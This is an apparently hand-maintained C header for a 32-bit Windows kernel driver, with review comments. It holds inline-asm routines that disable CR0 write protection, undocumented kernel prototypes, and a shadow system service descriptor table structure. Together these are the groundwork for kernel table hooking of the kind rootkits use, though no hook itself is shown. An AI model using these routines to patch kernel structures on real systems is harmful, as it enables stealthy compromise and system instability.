/*
用于放一些驱动中常用到的函数
*/
// Type definitions (Win32-style aliases on top of the kernel's ULONG).
// NOTE(review): this header targets 32-bit x86 only -- the inline asm below
// uses eax/cr0 -- and ULONG_PTR is aliased to a 32-bit ULONG here, which
// would not be pointer-sized on an x64 build.  ULONG_PTR/PULONG_PTR are
// normally already provided by the WDK headers (basetsd.h), so this typedef
// may collide with that definition depending on include order -- confirm.
typedef ULONG DWORD;
typedef int BOOL;
typedef unsigned short WORD;
typedef ULONG ULONG_PTR, *PULONG_PTR;
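// Write-protection control (x86, 32-bit, MSVC inline asm).
//
// WPOFF()/WPON() bracket a write to a read-only kernel page by clearing and
// then restoring CR0.WP on the current CPU.  State is kept in the globals
// below, so the pair is NOT reentrant: do not nest WPOFF() calls, and note
// that a second CPU entering WPOFF() concurrently overwrites the saved values
// (CR0 is per-CPU; the saved copy is shared).  Keep the window as short as
// possible.
// NOTE(review): these are definitions, not declarations, in a header; if the
// header is included from more than one translation unit the linker may
// report duplicate symbols -- confirm for this project's build.
ULONG g_uCr0;    // CR0 as it was on entry to WPOFF()
ULONG g_uEflags; // EFLAGS as it was on entry to WPOFF() (restores IF in WPON())

/*
 * WPOFF - disable write protection on the current CPU.
 *
 * Saves EFLAGS and CR0, masks interrupts so the thread cannot be preempted
 * or migrated while WP is off, then clears CR0 bit 16 (WP).  Must be paired
 * with WPON().  No return value; all state lives in g_uCr0 / g_uEflags.
 */
_inline void WPOFF()
{
    _asm
    {
        push eax
        pushfd                   // save EFLAGS (incl. IF) for WPON()
        pop eax
        mov g_uEflags, eax
        cli
        mov eax, cr0
        mov g_uCr0, eax          // save original CR0 for WPON()
        and eax, 0FFFEFFFFh      // clear bit 16 = CR0.WP
        mov cr0, eax
        pop eax
    };
}

/*
 * WPON - restore the state saved by WPOFF().
 *
 * Restores CR0 and then EFLAGS from the saved copies, so the interrupt flag
 * returns to whatever it was before WPOFF() rather than being forced on by an
 * unconditional STI (the previous behaviour, which would wrongly enable
 * interrupts if the caller had entered WPOFF() with them disabled).
 */
_inline void WPON()
{
    _asm
    {
        push eax
        mov eax, g_uCr0
        mov cr0, eax             // restore original CR0 (WP back to saved state)
        mov eax, g_uEflags
        push eax
        popfd                    // restore EFLAGS, including IF
        pop eax
    };
}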
// Prototypes for kernel exports the driver calls that the WDK headers do not
// declare (or declare only for user mode).
// NOTE(review): these are hand-written declarations, so the calling
// convention and parameter types are the author's assumptions, not taken
// from an official header -- confirm against the target OS build.

// NtWriteFile - native write-file system service.
// NOTE(review): when invoked from a driver the previous mode is KernelMode,
// so user-pointer probing of Buffer/IoStatusBlock is presumably skipped and
// FileHandle is resolved in the calling process's handle table; pass only
// kernel-owned buffers and a handle valid in that context -- verify.
NTSYSAPI
NTSTATUS
NTAPI
NtWriteFile (
IN HANDLE FileHandle,
IN HANDLE Event,
IN PIO_APC_ROUTINE ApcRoutine,
IN PVOID ApcContext,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset,
IN PULONG Key
);

// NtDeviceIoControlFile - native IOCTL system service; same previous-mode
// caveat as NtWriteFile applies to InputBuffer/OutputBuffer.
NTSYSAPI
NTSTATUS
NTAPI
NtDeviceIoControlFile (
HANDLE FileHandle,
HANDLE Event,
PIO_APC_ROUTINE ApcRoutine,
PVOID ApcContext,
PIO_STATUS_BLOCK IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);

// KeAddSystemServiceTable - registers an additional system service table in
// slot Index.  From the parameter names: Base is the array of service
// routine addresses, Count an optional per-service call-counter table, Limit
// the number of entries, Number the per-service argument-byte-count table.
// NOTE(review): Base is declared through this header's 32-bit ULONG_PTR
// alias (see the typedefs above); the real export takes pointer-sized
// entries.  Return value is BOOLEAN (presumably FALSE if the slot is already
// in use) -- confirm against the target kernel version.
NTSYSAPI
BOOLEAN
NTAPI
KeAddSystemServiceTable (
IN PULONG_PTR Base,
IN PULONG Count OPTIONAL,
IN ULONG Limit,
IN PUCHAR Number,
IN ULONG Index
);
// Four-entry service descriptor table; presumably mirrors the kernel's
// shadow table (KeServiceDescriptorTableShadow), with the first two slots
// in use and the last two reserved.
// NOTE(review): this layout is version- and architecture-specific, and the
// SERVICE_DESCRIPTOR_TABLE element type is not defined in this header -- it
// must come from an earlier include.  Confirm the layout for each target build.
typedef struct _SERVICE_DESCRIPTOR_TABLE_SHADOW
{
SERVICE_DESCRIPTOR_TABLE SSDT; // ntoskrnl.exe ( native api )
SERVICE_DESCRIPTOR_TABLE SSDTShadow; // win32k.sys (gdi/user support)
SERVICE_DESCRIPTOR_TABLE UnUsed1; // reserved slot
SERVICE_DESCRIPTOR_TABLE UnUsed2; // reserved slot
}SERVICE_DESCRIPTOR_TABLE_SHADOW, *PSERVICE_DESCRIPTOR_TABLE_SHADOW;